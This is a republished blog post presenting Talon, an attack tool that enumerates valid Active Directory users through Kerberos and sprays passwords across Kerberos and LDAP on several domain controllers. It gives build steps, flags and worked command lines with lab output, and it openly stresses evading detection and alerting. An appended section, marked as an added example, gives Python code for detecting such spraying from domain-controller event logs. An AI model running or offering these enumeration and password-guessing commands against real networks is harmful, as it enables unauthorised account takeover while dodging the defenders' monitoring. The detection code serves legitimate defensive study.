Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment
2020-11-29 20:30:00 Author: www.blogger.com

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lpy_5ucExJw/X8HRo_4CNeI/AAAAAAAAUfs/E8xrOzM_fVMbJplv6Tjx1QaZ5GSUdr-LQCNcBGAsYHQ/s707/Talon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="591" data-original-width="707" height="535" src="https://1.bp.blogspot.com/-lpy_5ucExJw/X8HRo_4CNeI/AAAAAAAAUfs/E8xrOzM_fVMbJplv6Tjx1QaZ5GSUdr-LQCNcBGAsYHQ/w640-h535/Talon.png" width="640" /></a></div><p><br /></p><p>Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can use either a single domain controller or multiple ones to perform these attacks, randomizing each attempt between the domain controllers and services (LDAP or Kerberos).</p><span><a name='more'></a></span><p><br /></p><p>More info about the techniques can be found on the following <a href="https://www.optiv.com/explore-optiv-insights/blog/digging-your-talons-new-take-password-guessing" rel="nofollow" target="_blank" title="Blog">Blog</a>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Download the release for your OS from <a href="https://github.com/optiv/Talon/releases" rel="nofollow" target="_blank" title="releases">releases</a>.</p> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Talon was developed in golang.</p> <p>The first step as always is to clone the repo. 
Before you compile Talon you'll need to install the dependencies. To install them, run the following commands:</p> <pre><code>go get github.com/fatih/color<br />go get gopkg.in/jcmturner/gokrb5.v7/client<br />go get gopkg.in/jcmturner/gokrb5.v7/config<br />go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID<br />go get gopkg.in/ldap.v2<br /></code></pre> <p>Then build it:</p> <pre><code>go build Talon.go<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>$ ./Talon -h<br />Usage of ./Talon:<br /> -D string<br /> Fully qualified domain to use<br /> -E Enumerates which users are valid<br /> -H string<br /> Domain controller to connect to<br /> -Hostfile string<br /> File containing the list of domain controllers to connect to<br /> -K Test against Kerberos only<br /> -L Test against LDAP only<br /> -O string<br /> File to append the results to<br /> -P string<br /> Password to use<br /> -U string<br /> Username to authenticate as<br /> -Userfile string<br /> File containing the list of usernames<br /> -debug<br /> Print debug statements<br /> -sleep float<br /> Time inbetween attempts (default 0.5)<br /></code></pre> <br /><span style="font-size: large;"><b>Enumeration Mode</b></span><br /> <p>User enumeration mode is executed with the <code>-E</code> flag, which sends only a Kerberos TGT pre-authentication request to the target KDC. This request is sent with a known-bad or no-longer-supported encryption type. Talon reviews the KDC's response: <code>KDC_ERR_ETYPE_NOSUPP</code> indicates that the user exists, and <code>KDC_ERR_C_PRINCIPAL_UNKNOWN</code> indicates that it does not. 
Talon can perform this type of enumeration against multiple domain controllers in an enterprise using the <code>-Hostfile</code> option to specify multiple domain controllers, or against a single domain controller using <code>-H</code>. This technique does not cause any login failures, so it will not lock out any of the users.</p> <pre><code>./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E <br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[-] 172.16.144.195 STARLABS.LOCAL\asmith: = User Does Not Exist<br />[+] 172.16.144.185 STARLABS.LOCAL\ballen: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\bjohnson: = User Does Not Exist<br />[-] 172.16.144.195 STARLABS.LOCAL\bwayne: = User Does Not Exist<br />[+] 172.16.144.195 STARLABS.LOCAL\csnow: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\jtodd: = User Does Not Exist<br />[+] 172.16.144.186 STARLABS.LOCAL\hwells: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\wwest: = User's Account Locked<br /></code></pre> <br /><span style="font-size: large;"><b>Automated Password Guessing Mode</b></span><br /> <p>Talon utilizes Kerberos and LDAP, which are both integrated into Active Directory for authentication. Talon can perform password guessing by alternating between the two services, allowing the password attack traffic to be split across two protocols. This splits the number of potential events generated and, as a result, reduces the chance of an alert. 
Talon takes this one step further by distributing a password attack against multiple domain controllers in an enterprise using the <code>-Hostfile</code> option, alternating between LDAP and Kerberos each time to create an additional layer of obscurity. A single domain controller can be provided using the <code>-H</code> option if needed.</p> <pre><code>./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /> <br />[-] 172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed<br />[-] 172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed<br />[-] 172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed<br />[+] 172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success<br />[-] 172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed<br /></code></pre> <p>Talon is designed to be versatile in any situation. As a result, if only Kerberos is available, Talon can be set to attack only Kerberos using the <code>-K</code> flag, or only LDAP using the <code>-L</code> flag.</p> <p>Talon can use both Kerberos and LDAP to read the responses as we perform a password guessing attack. Talon can detect account lockouts during an active password guessing attack by reading the response code from each password attempt. This can help prevent any unwanted account locks across an enterprise, helping you to remain undetected. Simply follow the prompt to quit or continue the attack.</p> <pre><code>root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" 
-sleep 2<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed<br />[-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed<br />[-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked<br />[*] Account lock out detected - Do you want to continue.[y/n]:<br /></code></pre> <br /><b>Troubleshooting</b><br /> <p>Talon comes equipped to detect whether the targeted domain controllers are active or have become unavailable. This helps ensure you're getting accurate results while not wasting time.</p> <pre><code>root@kali:~# ./Talon -H 172.14.15.1 -Userfile ValidUsers -D STARLABS.local -P "Frosty20" -sleep 2<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[Root cause: Networking_Error] Networking_Error: AS Exchange Error: failed sending AS_REQ to KDC: failed to communicate with KDC 172.14.15.1<br />[*] Do you want to continue.[y/n]:<br /></code></pre> <br /><b>Changelog</b><br /> <ul> <li>Published on 04/09/2018</li> <li>Version 1.2 released 02/14/2019</li> <li>Version 1.3 released 05/03/2019</li> <li>Version 1.4 released 03/17/2020</li> <li>Version 2.0 public release 06/18/2020</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/optiv/Talon" rel="nofollow" target="_blank" 
title="Download Talon">Download Talon</a></span></b></div>Zion3R
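
Detection-side view of the enumeration and distributed guessing modes described above, as an added example that is not part of the original post or the Talon project: it correlates domain-controller authentication failures by source address across every DC and both protocols, because each DC/protocol pair on its own sees only a fraction of the attempts. The tuple layout, host names, addresses and thresholds are constructed assumptions, as is the mapping of LDAP bind failures to event 4625.

```python
from collections import defaultdict

# Kerberos error codes (RFC 4120) as logged in the Result Code of event 4768.
ENUM_CODES = {0x6, 0xE}  # KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_ETYPE_NOSUPP
# Failed password checks: 4771 = Kerberos pre-auth failed, 4625 = failed logon
# (assumed here to be how a failed LDAP bind is recorded).
GUESS_EVENTS = {4771: "kerberos", 4625: "ldap"}

def classify(event_id, code):
    """Map one DC security event to (kind, protocol), or None if not relevant."""
    if event_id == 4768 and code in ENUM_CODES:
        return "enumeration", "kerberos"
    if event_id in GUESS_EVENTS:
        return "guessing", GUESS_EVENTS[event_id]
    return None

def correlate(events, window=300, min_users=4):
    """Group by source IP across all DCs and protocols in tumbling windows."""
    buckets = defaultdict(lambda: defaultdict(set))  # (src, kind, slot) -> (dc, proto) -> users
    for ts, dc, event_id, code, src, user in events:
        hit = classify(event_id, code)
        if hit:
            kind, proto = hit
            buckets[(src, kind, ts // window)][(dc, proto)].add(user.lower())
    findings = []
    for src, kind, slot in sorted(buckets):
        views = buckets[(src, kind, slot)]
        users = set().union(*views.values())
        if len(users) >= min_users:
            findings.append({
                "source": src, "kind": kind, "window_start": slot * window,
                "users": len(users),
                "dcs": sorted({dc for dc, _ in views}),
                "protocols": sorted({proto for _, proto in views}),
                # Most users any one DC/protocol pair saw on its own.
                "largest_single_view": max(len(u) for u in views.values()),
            })
    return findings

# Constructed sample: (epoch_seconds, dc, event_id, code, source_ip, user)
DCS = ["dc1", "dc2", "dc3"]
SAMPLE = (
    [(i, DCS[i % 3], 4768, (0x6, 0xE)[i % 2], "10.0.0.50", f"user{i}") for i in range(6)]
    + [(1000 + i, DCS[i % 3], (4771, 4625)[i % 2], (0x18, 0xC000006D)[i % 2],
        "10.0.0.50", f"user{i}") for i in range(6)]
    + [(1200 + i, "dc1", 4771, 0x18, "10.0.0.7", "alice") for i in range(3)]  # one user mistyping
)

if __name__ == "__main__":
    for finding in correlate(SAMPLE):
        print(finding)
```

Event 4768 and 4771 failures are only recorded when the Audit Kerberos Authentication Service subcategory audits failures on every domain controller, so the correlation is blind on any DC where that is off.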

Source: http://www.blogger.com/feeds/8317222231133660547/posts/default/2982850037566839307